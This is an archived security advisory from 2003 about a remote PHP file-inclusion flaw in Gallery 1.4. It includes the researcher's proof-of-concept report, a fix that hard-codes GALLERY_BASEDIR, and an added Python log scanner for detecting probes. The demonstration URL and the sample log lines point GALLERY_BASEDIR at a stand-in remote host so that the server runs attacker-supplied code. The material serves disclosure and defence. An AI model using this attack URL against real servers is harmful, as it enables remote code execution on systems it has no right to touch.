SecurityTracker.com
Category:   Application (Multimedia)  >   Gallery
Vendors:   Gallery Project
Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution
SecurityTracker Alert ID:  1007916
SecurityTracker URL:  http://securitytracker.com/id/1007916
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Oct 11 2003
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.4
Description:   An include file vulnerability was reported in Gallery. A remote user can execute arbitrary PHP code on the target system.

It is reported that a remote user can specify a remote location for the GALLERY_BASEDIR variable to cause a PHP file at the remote location to be included and executed on the target system.

A demonstration exploit URL is provided:

http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/

The above URL will include and execute the contents of the "http://tester/util.php" file.

[Editor's note: The same flaw, or at least a similar flaw, was reported in July 2002 in Alert ID 1004918 and reportedly fixed in Gallery 1.3.1]

Impact:   A remote user can execute arbitrary PHP code, including operating system commands, on the target system. The code will run with the privileges of the target web server.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has indicated that, as a solution, you can change the following lines in the index.php files in the setup folder from this:

if (!isset($GALLERY_BASEDIR)) {
	$GALLERY_BASEDIR = '../';
}

to this:

$GALLERY_BASEDIR = '../';

Vendor URL:  gallery.sourceforge.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 24 2003 (Vendor Issues Fix) Re: Gallery Input Validation Flaw in GALLERY_BASEDIR (Again) Permits Remote Code Execution
The vendor has issued a fix.
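
As an added example (not part of the advisory or the original report), the following Python script flags web server access-log entries whose query string supplies GALLERY_BASEDIR, the pattern shown in the demonstration URL above. The log lines, client addresses and the /gallery/ path are constructed for illustration, and the combined log format is an assumption.

```python
import re
from urllib.parse import parse_qsl

# Request line inside a combined-format access-log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, https://, ftp://, ...)
REMOTE_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)

# Constructed sample entries; addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Oct/2003:10:00:01 +0000] "GET /gallery/albums.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [11/Oct/2003:10:00:05 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http://tester/ HTTP/1.1" 200 312',
    '198.51.100.7 - - [11/Oct/2003:10:00:09 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=http%3A%2F%2Ftester%2F HTTP/1.0" 200 312',
    '192.0.2.44 - - [11/Oct/2003:10:02:30 +0000] "GET /gallery/setup/index.php?GALLERY_BASEDIR=../ HTTP/1.1" 200 2048',
]

def classify(log_line):
    """Return None, 'override' or 'remote-include' for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = m.group(1).partition("?")[2]
    verdict = None
    # parse_qsl percent-decodes names and values, so an encoded
    # http%3A%2F%2F... value is compared in its decoded form.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != "GALLERY_BASEDIR":  # PHP variable names are case-sensitive
            continue
        if REMOTE_RE.match(value.strip()):
            return "remote-include"  # value points at another host
        verdict = "override"  # a client should never set this variable at all
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every line that sets GALLERY_BASEDIR."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Any hit is worth reviewing: a legitimate client has no reason to pass GALLERY_BASEDIR, so even the "override" verdict indicates probing of the setup script.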



 Source Message Contents

Subject:  Gallery 1.4 including file vulnerability




Gallery 1.4 including file vulnerability

-Background Information-
Gallery is a Web-based software product that lets you manage photos on any Web site that offers PHP support. With Gallery you can easily create and maintain albums of photos via an intuitive interface. Photo management includes automatic thumbnail creation, image resizing, rotation, ordering, captioning, searching, and more. Albums can have read, write, and caption permissions per individual authenticated user for an additional level of privacy. Gallery is installed on maybe 20000 locations.

-Proof of concept-
It is possible to include any PHP file from a remote host and execute it on the target's server.
This works:
http://victim/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://tester/
If the file "http://tester/util.php" exists, it will be included. This file could look like this if PHP isn't supported on the "tester"-host:

<?php echo "Vulnerable"; ?>

or like this, if PHP is supported on the "tester"-host:

<?php
echo "<?php die(\"Vulnerable\"); ?>";
?>

-Solution-
Change the following lines in the index.php files in the setup folder:

if (!isset($GALLERY_BASEDIR)) {
	$GALLERY_BASEDIR = '../';
}

to this:

	$GALLERY_BASEDIR = '../';

-Related URLs-
http://gallery.sourceforge.net/
https://sourceforge.net/projects/gallery/

RQ Labs
Rootquest
Switzerland

 
 

